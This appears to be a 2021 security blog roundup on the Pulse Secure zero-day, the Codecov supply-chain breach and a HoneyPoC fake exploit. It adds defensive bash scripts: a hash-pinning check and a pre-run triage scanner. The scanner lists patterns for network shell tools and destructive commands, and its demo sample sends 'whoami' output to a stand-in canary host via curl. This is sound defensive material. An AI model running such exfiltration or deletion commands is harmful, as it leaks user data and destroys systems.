Another day, another 0-day

On April 20, Pulse Secure disclosed CVE-2021-22893, an unauthenticated remote code execution vulnerability in Pulse Connect Secure (PCS) with a CVSS score of 10.0. PCS is a VPN appliance by Pulse Secure which includes security features such as MFA; however, this CVE allows an attacker to bypass single and multi-factor authentication and gain a foothold inside your organization. To make matters worse, this vulnerability has already been used in the wild, making this another critical 0-day vulnerability.

Mandiant reports they are currently tracking 12 malware families related to Pulse Secure VPN exploits. Several vulnerabilities from 2019 and 2020 are being used as part of these campaigns as well as the recently disclosed CVE-2021-22893. These malware families are all bypassing authentication on these VPN devices but are not directly related to each other. The main group being tracked is UNC2630, believed to be a Chinese state-backed actor possibly related to APT5 and targeting US defense, finance, and government organizations. A second group, UNC2717, was observed targeting a European organization in March 2021.

Mandiant has identified a few novel malware families specifically targeting these vulnerable Pulse devices. SLIGHTPULSE is a web shell capable of arbitrary file reads, writes, and command execution. RADIALPULSE is a modified Perl script associated with a legit PulseSecure web application that logs credentials, including usernames and passwords, of legit users as they log in. One of the malware families being tracked is a new family referred to as SLOWPULSE which comes in multiple variants. Each variant is capable of bypassing different authentication procedures (some 2FA) or in some cases logs credentials. The full list of malware families related to known Pulse Secure breaches along with attribution is as follows:

  • UNC2630 - SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK
  • UNC2717 - HARDPULSE, QUIETPULSE, and PULSEJUMP

We highly recommend updating your firmware if possible, though there are no patches yet for CVE-2021-22893. Pulse has released an Integrity Tool to help customers with mitigation. The Perch team already has some automated OSINT intelligence gathering that has been scraping the internet and collecting any and all available indicators related to the malware and will continue to research the vulnerabilities as more information becomes available.

Codecov supply chain attack

At the end of last year, we learned of a major attack targeting SolarWinds customers, which has had everyone concerned about supply-chain attacks. This week, another major supply-chain attack was disclosed targeting users of Codecov’s code auditing tools, specifically their Bash Uploader script. According to Codecov’s website, “The Codecov Bash Uploader provides a language-agnostic alternative for sending your coverage reports to Codecov.” According to Codecov’s published security update, someone was able to gain unauthorized access to this script due to an error in Codecov’s Docker image that let the attacker extract credentials, which they then used to modify the Bash Uploader script.

Codecov first noticed these changes on April 1 and then began a forensic investigation that revealed a breach going back to January 31. According to the post from Codecov, the modified Bash Uploader could have affected the following:

  • Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

Affected customers have been contacted with remediation recommendations. Codecov recommends resetting all credentials, access tokens, and keys that the Bash Uploader could access. It would also be a good idea to update any locally stored versions of Bash Uploader to the latest at https://codecov.io/bash.
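One way to keep a silently modified uploader from running in CI is to pin its SHA-256 and verify it before execution. The script below is an added example, not Codecov's code; the stand-in uploader, its file name, and the pinned digest are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example: execute a CI helper script only if it matches a pinned SHA-256.
# The stand-in uploader and its digest are constructed for this demo.

# sha256_of FILE -> hex digest (sha256sum on Linux, shasum on macOS)
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_pinned FILE EXPECTED_HEX -> 0 on match, 1 on mismatch or missing file
verify_pinned() {
    local file="$1" expected="$2" actual
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    actual="$(sha256_of "$file")"
    if [ "$actual" != "$expected" ]; then
        printf 'digest mismatch for %s\n  expected %s\n  actual   %s\n' \
            "$file" "$expected" "$actual" >&2
        return 1
    fi
}

# run_if_pinned FILE EXPECTED_HEX [ARGS...]
# The script is fetched to disk first and never piped straight into bash,
# so the bytes that were checked are the bytes that run.
run_if_pinned() {
    local file="$1" expected="$2"
    shift 2
    verify_pinned "$file" "$expected" || return 1
    bash "$file" "$@"
}

# Demo: pin a stand-in uploader, run it, then append one line and try again.
demo() {
    local dir pin
    dir="$(mktemp -d)"
    printf '#!/bin/bash\necho "uploading coverage"\n' > "$dir/uploader.sh"
    pin="$(sha256_of "$dir/uploader.sh")"   # in CI this is a reviewed constant
    run_if_pinned "$dir/uploader.sh" "$pin"
    echo 'echo "line added after review"' >> "$dir/uploader.sh"
    run_if_pinned "$dir/uploader.sh" "$pin" || echo "blocked: uploader changed"
    rm -rf "$dir"
}
demo
```

In a real pipeline the pinned digest is a constant committed alongside the CI configuration and changed only through code review, so an upstream modification fails the build instead of running with the runner's secrets.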

As the investigation continues, it is possible that the actors behind the original compromise have used the breach to pivot into customer networks, which include major tech companies such as IBM and HP. At this point, the full extent of this breach is not yet known, but this will most likely be an event comparable to the SolarWinds hack in both the skills required to carry it out and the scope of organizations affected.

Read the Source

And now for something completely different. While investigating the Pulse Connect vulnerability above, I ran across some proof-of-concept (PoC) code on GitHub. I sent the link to one of the researchers on my team and asked him to check it out so we can build some detection signatures around it. A little while later, he messaged me and asked if I had read the code. Of course, I had not, that’s what I have a team for, but on his prompting, I took a look at the source code.

The relevant exploit script in this repo is named exploit.sh, and it begins with basic checks on which arguments are passed to the script, along with some simple usage instructions:

Bash script to achieve RCE

Flags:

-c Target IP Address.

usage: exploit.sh -c

example: exploit.sh -c 10.0.0.1

If you run the script using the arguments listed above, you then see the following:

[!] Exploiting Host -c

This looks normal for PoCs. Then you see:

[+] Beginning Erasure of /

Then it seems to pause for a few seconds, while you process what you’re seeing, and then it looks like all the files on your local hard drive are deleted before your eyes. After a few minutes of shock, if you don’t do anything to intervene, it finally finishes listing all your local files and says:

[!] Deleted Root File System.

Another pause for a few seconds. Just enough time for you to consider your folly. Maybe you should have read the code before running it. And then, the finale:

We’re no strangers to love

You know the rules and so do I.

A full commitment’s what I’m thinking of.

You wouldn’t get this from any other guy.

I just wanna tell you how I’m feeling.

Gotta make you understand

Never gonna give you up.

Never gonna let you down.

Never gonna run around and desert you.

Never gonna make you cry.

Never gonna say goodbye.

Never gonna tell a lie and hurt you.

Warning: Binary output can mess up your terminal. Use "--output -" to tell

Warning: curl to output it to your terminal anyway, or consider "--output

Warning: <FILE>" to save to a file.

[!] You should have read the source. HoneyPoC 3.0 - https://blog.zsec.uk/cve-2020-1350-honeypoc/

It appears this was all a ruse, part of a research project named HoneyPoC that creates fake PoCs and embeds canaries used to track information on who is downloading PoCs. See the link at the end of the chorus for more information.

Of course, the researcher on my team and I both read the code before running it, but this is a good reminder to never blindly run someone else’s code no matter what it is or where you get it. You might get Rick Roll’d or very possibly much worse.
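A quick static pass before running a downloaded PoC can surface what its banner text hides. The triage script below is an added example, not part of the HoneyPoC project; the sample file it scans is constructed to mimic the behaviour described above (alarming messages, a file listing, one outbound request), and the pattern list is a starting assumption rather than a complete one.

```bash
#!/usr/bin/env bash
# Added example: static pre-run triage of an untrusted shell script.
# The target file is only read with grep; nothing in it is executed.

# scan CATEGORY REGEX FILE -> "lineno:CATEGORY:source line" for each match
scan() {
    grep -nE -- "$2" "$3" | sed "s/^\([0-9][0-9]*\):/\1:$1:/"
}

# triage FILE -> all findings, ordered by line number then category
triage() {
    local f="$1" w='(^|[^[:alnum:]_])'   # crude left word boundary
    {
        scan network     "${w}(curl|wget|nc|ncat)[[:space:]]" "$f"
        scan destructive "${w}(rm[[:space:]]+-[[:alpha:]]*[rRf]|dd[[:space:]]+if=|mkfs)" "$f"
        scan hidden-exec "${w}(eval[[:space:]]|base64[[:space:]]+(-d|--decode))|[|][[:space:]]*(ba)?sh([[:space:]]|\$)" "$f"
        scan host-info   "${w}(whoami|hostname|uname)" "$f"
    } | sort -t: -k1,1n -k2,2
    return 0
}

# count_hits FILE CATEGORY -> number of findings in that category
count_hits() {
    triage "$1" | awk -F: -v c="$2" '$2 == c { n++ } END { print n + 0 }'
}

# Constructed sample: claims to erase /, but contains no delete command
# and makes one outbound request carrying the local user name.
write_sample() {
    cat > "$1" <<'EOF'
#!/bin/bash
echo "[!] Exploiting Host $2"
echo "[+] Beginning Erasure of /"
find / -maxdepth 1 -print
curl -s "https://canary.example.invalid/hit?u=$(whoami)"
echo "[!] Deleted Root File System."
EOF
}

sample="$(mktemp)"
write_sample "$sample"
triage "$sample"
echo "destructive commands found: $(count_hits "$sample" destructive)"
rm -f "$sample"
```

On the constructed sample the only findings are the `curl` line (network and host-info) with zero destructive commands, which is the mismatch between what a script prints and what it does that reading the source is meant to catch.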

  • Bryson Medlock, the Dungeon Master

References

https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/

https://arstechnica.com/gadgets/2021/04/hackers-are-exploiting-a-pulse-secure-0day-to-breach-orgs-around-the-world/

https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

https://www.zdnet.com/article/codecov-breach-impacted-hundreds-of-customer-networks/

https://about.codecov.io/security-update/

https://docs.codecov.io/docs/about-the-codecov-bash-uploader

https://www.reuters.com/technology/codecov-hackers-breached-hundreds-restricted-customer-sites-sources-2021-04-19/